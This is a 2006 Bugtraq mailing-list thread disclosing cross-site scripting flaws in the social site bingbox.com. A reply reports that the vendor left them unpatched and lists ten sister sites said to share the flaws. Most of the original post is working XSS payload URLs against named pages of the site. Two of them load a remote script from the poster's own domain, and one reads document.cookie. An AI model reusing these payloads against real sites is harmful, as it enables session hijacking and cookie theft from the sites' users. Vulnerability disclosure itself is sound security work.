Re: Bingbox.com - XSS & cookie disclosure

["Sven Vetsch" <sven.vetsch () disenchant ch>]

Hi

Yes, there must be the XSS heaven :)

I contacted the INCROWD Interactive Media first time in March this year and 
they always said, that they will patch it. Unfortunately they didn't do 
anything until now and I didn't believe that they will do before someone do 
a real nasty hack (using for DDoS for example).

There will be some similar products to bingbox.com which have all the same 
vulnerabilities:
redbox.de
coolbox.be
coolbox.fr
coolbox.hu
obox.nl
xobox.de
xobox.at
xobox.ch
bingbox.co.uk
gentebox.es

So, we only can hope, that they will now patch it, else it seems to be their 
end.

Greetings,
Disenchant

----- Original Message ----- 
From: <luny () youfucktard com>
To: <bugtraq () securityfocus com>
Sent: Friday, June 16, 2006 8:37 AM
Subject: Bingbox.com - XSS & cookie disclosure


Bingbox.com

Homepage:
http://www.bingbox.com

Affected files:

* Profile input boxes:

- City input

* Registering

* Viewing Birthdays

* Adding a friend

* Viewing people online
-----------------------------------------------

XSS with cookie disclosure via inviting friends:
http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=start";>">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<

"<"<'<'<'

XSS vuln with cookie disclosure via "City" input box on profile:

Data isnt properly sanatized before being generated. In one part of the site 
its output as full code on the screen (tested using <img> tags, with <table> 
tags, no

code displays), and on the other part, an XSS can occur:

For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode 
for ':

<TABLE BACKGROUND=javascript:alert(&#0000039XSS&#0000039)>

For the cookie:

<TABLE BACKGROUND=javascript:alert(document.cookie)>

--------------------------------------------------

XSS with cookie disclosure when viewing a blog, that redirects you to the 
register page:

http://bingbox.com/go/register/wanted=luny666/";>">">">">">'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<"

-----------------------------------------------

XSS via viewing birthdays:

http://www.bingbox.com/go/birthdays/month=8&day=13";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><

"<"

-------------------------------------------------

XSS when adding a new friend. Same as above, we arent able to use ' or long 
UTF-8 unicode above, so we use fromCharCode's. PoC:

http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))

> <"<"<"<"<'<'<'<"<""><"<"

--------------------------------------------------

XSS vuln when viewing people online:

http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))

> <"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3

------------------------------------------------

More XSS vulns:

http://www.bingbox.com/go/static/file=av";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=ps";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=gedragscode";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><


Screenshots:
http://www.youfucktard.com/xsp/bingbox1.jpg
http://www.youfucktard.com/xsp/bingbox2.jpg
http://www.youfucktard.com/xsp/bingbox3.jpg
http://www.youfucktard.com/xsp/bingbox4.jpg
http://www.youfucktard.com/xsp/bingbox5.jpg
http://www.youfucktard.com/xsp/bingbox6.jpg
http://www.youfucktard.com/xsp/bingbox7.jpg
http://www.youfucktard.com/xsp/bingbox8.jpg



__________ NOD32 1.1454 (20060321) Information __________

This message was checked by NOD32 antivirus system.
http://www.eset.com

Attachment: smime.p7s
Description: